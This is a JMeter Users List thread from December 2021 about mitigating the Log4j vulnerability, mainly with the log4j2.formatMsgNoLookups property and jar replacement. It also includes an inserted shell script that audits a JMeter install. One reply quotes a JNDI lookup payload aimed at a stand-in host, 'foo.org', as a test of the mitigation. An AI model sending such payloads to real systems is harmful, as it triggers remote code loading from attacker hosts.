Re: Jmeter Log4J

2021-12-15 Thread Mariusz W
I mean, the setting works. Try (without the setting) to build a plan that has
the header: User-Agent: $ {jndi: ldap: //foo.org/attack} in the HTTP Header
Manager in an HTTP sampler and execute the script. The script hangs and after
a few dozen seconds you will see a ConnectException to the foo.org server in
the console logs. The risk of someone attacking you in JMeter in this way
is small (you must follow an unknown plan).

Mariusz

On Wed, 15 Dec 2021 at 18:43, Yevgeniy Grimaylo wrote:

> Hello,
>
> Would you please clarify how adding the next line to the *system.properties*
> file (lives in "bin" folder of your JMeter installation) mitigates the
> security risk with log4j2?
>
>
>
> Thanks,
>
> Yevgeniy Grimaylo
>
>
>
> *From: *Mariusz W 
> *Reply-To: *JMeter Users List 
> *Date: *Wednesday, December 15, 2021 at 4:09 AM
> *To: *JMeter Users List 
> *Subject: *Re: Jmeter Log4J
>
>
>
> I tested it and it works:)
>
> *-Dlog4j2.formatMsgNoLookups=true*
>
>
>
> Regards,
>
> Mariusz
>
>
>
> On Tue, 14 Dec 2021 at 16:45, Dmitri T  wrote:
>
> It should be sufficient to add the next line to *system.properties* file
> (lives in "bin" folder of your JMeter installation)
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via -D command-line argument like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*
>
> More information:
>
> - Constants.java from log4j 2.13.3
>   <https://github.com/apache/logging-log4j2/blob/log4j-2.13.3/log4j-core/src/main/java/org/apache/logging/log4j/core/util/Constants.java#L63>
> - Configuring JMeter
>   <https://jmeter.apache.org/usermanual/get-started.html#configuring_jmeter>
> - Apache JMeter Properties Customization Guide
>   <https://www.blazemeter.com/blog/apache-jmeter-properties-customization>
> - Overriding Properties Via The Command Line
>   <https://jmeter.apache.org/usermanual/get-started.html#override>
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified on Apache Log4j on 10th
> December, I wanted to know if there will be a new version of the Apache
> JMeter planned with the latest log4j versions.
>
>
>
> With the organization security policy, there will be a scan on the log4j.
> We know this will not have any impact with the vulnerability identified,
> but to provide the InfoSec team, with a confirmation email from the
> provider will be an added confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile   : + 91 8880138672
> Email : sranjanr...@firstam.com
>
>
>
>
>
>
>
>
>
>
> **
> This message may contain confidential or proprietary information intended
> only for the use of the addressee(s) named above or may contain information
> that is legally privileged.
> If you are not the intended addressee, or the person responsible for
> delivering it to the intended addressee, you are hereby notified that
> reading, disseminating, distributing or copying this message is strictly
> prohibited.
> If you have received this message by mistake, please immediately notify us
> by replying to the message and delete the original message and any copies
> immediately thereafter.
>
> If you received this email as a commercial message and would like to opt
> out of future commercial messages, please let us know and we will remove
> you from our distribution list.
>
> Thank you.
>
> **
> FAFLD
>
>
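
A check for the setting discussed in this thread, as an added example that is not part of the original posts or of JMeter: it reports whether bin/system.properties enables log4j2.formatMsgNoLookups and which log4j-core jars sit in lib/. The function names and the jar-name parsing are assumptions of this example. Log4j reads the property from 2.10 on; the script looks only at the file (not at a -D argument given at launch) and does not judge whether a jar version is itself patched.

```shell
#!/bin/sh
# Added example: audit a JMeter install for the property discussed in the thread.
# Assumes the standard layout: $JMETER_HOME/bin/system.properties and lib/*.jar.

# Print "set" if an uncommented line enables the property, otherwise "unset".
lookups_property_state() {
    props="$1/bin/system.properties"
    pat='^[[:space:]]*log4j2\.formatMsgNoLookups[[:space:]]*[=:][[:space:]]*[Tt][Rr][Uu][Ee][[:space:]]*$'
    if [ -f "$props" ] && grep -Eq "$pat" "$props"; then
        echo set
    else
        echo unset
    fi
}

# Print the version taken from each lib/log4j-core-<version>.jar file name.
log4j_core_versions() {
    for jar in "$1"/lib/log4j-core-*.jar; do
        [ -e "$jar" ] || continue        # glob matched nothing
        name=${jar##*/}
        name=${name#log4j-core-}
        echo "${name%.jar}"
    done
}

# Succeed if version $1 is 2.10 or later, the releases that read the property.
honours_property() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    case "$major" in ''|*[!0-9]*) return 1 ;; esac
    case "$minor" in ''|*[!0-9]*) return 1 ;; esac
    [ "$major" -gt 2 ] || { [ "$major" -eq 2 ] && [ "$minor" -ge 10 ]; }
}

# One line per jar: OK, WARN or FAIL followed by the reason.
audit_jmeter_log4j() {
    state=$(lookups_property_state "$1")
    versions=$(log4j_core_versions "$1")
    if [ -z "$versions" ]; then
        echo "FAIL no log4j-core jar found under $1/lib"
        return 0
    fi
    for v in $versions; do
        if ! honours_property "$v"; then
            echo "FAIL log4j-core $v does not read formatMsgNoLookups; replace the jars"
        elif [ "$state" = set ]; then
            echo "OK log4j-core $v with log4j2.formatMsgNoLookups=true in system.properties"
        else
            echo "WARN log4j-core $v without the property in system.properties"
        fi
    done
}

# Usage: sh audit.sh /path/to/apache-jmeter
if [ -n "${1:-}" ]; then audit_jmeter_log4j "$1"; fi
```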


Re: Jmeter Log4J

2021-12-15 Thread Yevgeniy Grimaylo
Hello,
Would you please clarify how adding the next line to the system.properties file 
(lives in "bin" folder of your JMeter installation) mitigates the security risk 
with log4j2?

Thanks,
Yevgeniy Grimaylo

From: Mariusz W 
Reply-To: JMeter Users List 
Date: Wednesday, December 15, 2021 at 4:09 AM
To: JMeter Users List 
Subject: Re: Jmeter Log4J

I tested it and it works:)
-Dlog4j2.formatMsgNoLookups=true

Regards,
Mariusz

On Tue, 14 Dec 2021 at 16:45, Dmitri T <glin...@live.com> wrote:

It should be sufficient to add the next line to system.properties file (lives 
in "bin" folder of your JMeter installation)

log4j2.formatMsgNoLookups=true

or pass this property via -D command-line argument like:

jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .

More information:

  *   Constants.java from log4j 2.13.3
      <https://github.com/apache/logging-log4j2/blob/log4j-2.13.3/log4j-core/src/main/java/org/apache/logging/log4j/core/util/Constants.java#L63>
  *   Configuring JMeter
      <https://jmeter.apache.org/usermanual/get-started.html#configuring_jmeter>
  *   Apache JMeter Properties Customization Guide
      <https://www.blazemeter.com/blog/apache-jmeter-properties-customization>
  *   Overriding Properties Via The Command Line
      <https://jmeter.apache.org/usermanual/get-started.html#override>


On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
Hi Team,

With the recent vulnerabilities identified on Apache Log4j on 10th December, I 
wanted to know if there will be a new version of the Apache JMeter planned with 
the latest log4j versions.

With the organization security policy, there will be a scan on the log4j. We 
know this will not have any impact with the vulnerability identified, but to 
provide the InfoSec team, with a confirmation email from the provider will be 
an added confidence.

Thanks in advance.

Thanks, and Regards,
Smruti Ranjan Roul
Technical Lead- QA
First American (India) Private Limited
“Aveda Meta”, No.184, Old Madras Road,
Opp. Swami Vivekanand Metro Station,
Indiranagar, Bangalore-560038, Karnataka, India
Mobile   : + 91 8880138672
Email : sranjanr...@firstam.com






Re: Jmeter Log4J

2021-12-15 Thread Mariusz W
I tested it and it works:)
*-Dlog4j2.formatMsgNoLookups=true*

Regards,
Mariusz

On Tue, 14 Dec 2021 at 16:45, Dmitri T  wrote:

> It should be sufficient to add the next line to *system.properties* file
> (lives in "bin" folder of your JMeter installation)
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via -D command-line argument like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*
>
> More information:
>
> - Constants.java from log4j 2.13.3
> - Configuring JMeter
> - Apache JMeter Properties Customization Guide
> - Overriding Properties Via The Command Line
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified on Apache Log4j on 10th
> December, I wanted to know if there will be a new version of the Apache
> JMeter planned with the latest log4j versions.
>
>
>
> With the organization security policy, there will be a scan on the log4j.
> We know this will not have any impact with the vulnerability identified,
> but to provide the InfoSec team, with a confirmation email from the
> provider will be an added confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile   : + 91 8880138672
> Email : sranjanr...@firstam.com


Re: Jmeter Log4J

2021-12-14 Thread Valery Zabawski
Thank you! Replacing files looks like the easiest way, so I’m going to give 
it a try.
Thanks to everyone for the reply. 

> On 14 Dec 2021, at 18:54, Philippe Mouawad wrote:
> 
> 
> Hello,
> You can also read this:
> https://www.ubik-ingenierie.com/blog/jmeter-and-the-log4j2-vulnerability/
> 
> Regards
> 
>> On Tue, Dec 14, 2021 at 4:45 PM Dmitri T  wrote:
>> It should be sufficient to add the next line to system.properties file 
>> (lives in "bin" folder of your JMeter installation)
>> 
>> log4j2.formatMsgNoLookups=true
>> 
>> or pass this property via -D command-line argument like:
>> 
>> jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .
>> 
>> More information:
>> 
>> Constants.java from log4j 2.13.3
>> Configuring JMeter
>> Apache JMeter Properties Customization Guide
>> Overriding Properties Via The Command Line
>> 
>> 
>> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>>> Hi Team,
>>> 
>>>  
>>> 
>>> With the recent vulnerabilities identified on Apache Log4j on 10th 
>>> December, I wanted to know if there will be a new version of the Apache 
>>> JMeter planned with the latest log4j versions.
>>> 
>>>  
>>> 
>>> With the organization security policy, there will be a scan on the log4j. 
>>> We know this will not have any impact with the vulnerability identified, 
>>> but to provide the InfoSec team, with a confirmation email from the 
>>> provider will be an added confidence.
>>> 
>>>  
>>> 
>>> Thanks in advance.
>>> 
>>>  
>>> 
>>> Thanks, and Regards,
>>> Smruti Ranjan Roul
>>> Technical Lead- QA
>>> 
>>> 
>>> First American (India) Private Limited
>>> “Aveda Meta”, No.184, Old Madras Road, 
>>> Opp. Swami Vivekanand Metro Station,
>>> Indiranagar, Bangalore-560038, Karnataka, India
>>> 
>>> Mobile   : + 91 8880138672
>>> Email : sranjanr...@firstam.com
> 
> 
> -- 
> Cordialement
> Philippe M.
> Ubik-Ingenierie


Re: Jmeter Log4J

2021-12-14 Thread Philippe Mouawad
Hello,
You can also read this:
https://www.ubik-ingenierie.com/blog/jmeter-and-the-log4j2-vulnerability/

Regards

On Tue, Dec 14, 2021 at 4:45 PM Dmitri T  wrote:

> It should be sufficient to add the next line to *system.properties* file
> (lives in "bin" folder of your JMeter installation)
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via -D command-line argument like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*
>
> More information:
>
> - Constants.java from log4j 2.13.3
> - Configuring JMeter
> - Apache JMeter Properties Customization Guide
> - Overriding Properties Via The Command Line
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified on Apache Log4j on 10th
> December, I wanted to know if there will be a new version of the Apache
> JMeter planned with the latest log4j versions.
>
>
>
> With the organization security policy, there will be a scan on the log4j.
> We know this will not have any impact with the vulnerability identified,
> but to provide the InfoSec team, with a confirmation email from the
> provider will be an added confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile   : + 91 8880138672
> Email : sranjanr...@firstam.com

-- 
Cordialement
Philippe M.
Ubik-Ingenierie


Re: Jmeter Log4J

2021-12-14 Thread Dmitri T
It should be sufficient to add the next line to /system.properties/ file 
(lives in "bin" folder of your JMeter installation)


*log4j2.formatMsgNoLookups=true*

or pass this property via -D command-line argument like:

*jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .*

More information:

 * Constants.java from log4j 2.13.3
 * Configuring JMeter
 * Apache JMeter Properties Customization Guide
 * Overriding Properties Via The Command Line


On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:


Hi Team,

With the recent vulnerabilities identified on Apache Log4j on 10th 
December, I wanted to know if there will be a new version of the 
Apache JMeter planned with the latest log4j versions.


With the organization security policy, there will be a scan on the 
log4j. We know this will not have any impact with the vulnerability 
identified, but to provide the InfoSec team, with a confirmation email 
from the provider will be an added confidence.


Thanks in advance.

Thanks, and Regards,
Smruti Ranjan Roul
Technical Lead- *QA*


First American (India) Private Limited
“Aveda Meta”, No.184, Old Madras Road,
Opp. Swami Vivekanand Metro Station,
Indiranagar, Bangalore-560038, Karnataka, India

Mobile : + 91 8880138672
Email : sranjanr...@firstam.com 






Jmeter Log4J

2021-12-14 Thread Smruti Ranjan Roul
Hi Team,

With the recent vulnerabilities identified on Apache Log4j on 10th December, I 
wanted to know if there will be a new version of the Apache JMeter planned with 
the latest log4j versions.

With the organization security policy, there will be a scan on the log4j. We 
know this will not have any impact with the vulnerability identified, but to 
provide the InfoSec team, with a confirmation email from the provider will be 
an added confidence.

Thanks in advance.

Thanks, and Regards,
Smruti Ranjan Roul
Technical Lead- QA
First American (India) Private Limited
"Aveda Meta", No.184, Old Madras Road,
Opp. Swami Vivekanand Metro Station,
Indiranagar, Bangalore-560038, Karnataka, India
Mobile   : + 91 8880138672
Email : sranjanr...@firstam.com



